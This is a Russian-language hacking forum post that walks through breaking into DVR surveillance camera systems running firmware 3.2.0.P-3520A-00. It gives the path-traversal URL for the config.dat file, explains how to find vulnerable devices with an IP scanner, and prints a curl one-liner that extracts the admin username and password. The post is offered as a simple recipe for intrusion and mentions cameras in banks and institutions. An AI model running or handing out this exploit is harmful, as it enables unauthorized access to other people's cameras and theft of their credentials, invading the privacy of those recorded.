Взлом и получение доступа к камерам наблюдения

CLAY
Оффлайн

CLAY

Регистрация
25.01.17
Сообщения
763
Реакции
225
Репутация
292
Всем привет, хочу донести до Вас информацию, может и есть в открытом доступе но она не расписана и не разжёванная. Сейчас очень много приходит информации о взломанных камерах наблюдениях, в банках, в учреждениях, даже на Украине на донбасе в последние время начали в мелькать подобные сообщения.

hulp-met-computer-webcamhack.jpg



Информация

Для начала, посмотрим на саму уязвимость, она была виставлена на
You must be registered for see links
с тайтлом
You must be registered for see links
, — регистратор на 16 камер + 2 выхода на аудио, на котором стоит прошивка 3.2.0.P-3520A-00, и другие устройства с этой прошивкой. Атакующий может получить доступ к файлам конфигурации, таких как config.dat, где находится инфа для входа в веб интерфейс.

Адрес где лежит конфигурационный файл.

http://[IP ADDRESS]/../../../mnt/mtd/config/config.dat
1
http://[IP ADDRESS]/../../../mnt/mtd/config/config.dat
Парсинг

Именно для меня на данный момент такой способ парсинга самый актуальный.
Использую я Advanced IP Scanner — линк на офф
You must be registered for see links


Сам сканер. Выбран диапазон IP. Нас интересует шапка DVR Components Download

9lle6o.png


Вот такой вид имеет панель входа.

30as590.png


Вот код самого експлойта

curl http://[IP Address]/../../../mnt/mtd/config/config.dat 2>/dev/null | strings
1
curl http://[IP Address]/../../../mnt/mtd/config/config.dat 2>/dev/null | strings
Вот пример

2hfs780.png


Ну и все в итоге у нас юзер и пасс от панели

2ziy93q.png


Maybe End

Все очень и очень просто.
Есть еще поисковик
You must be registered for see links
через который тоже можно искать камеры.
 
Войдите или зарегистрируйтесь для ответа.
Сверху Снизу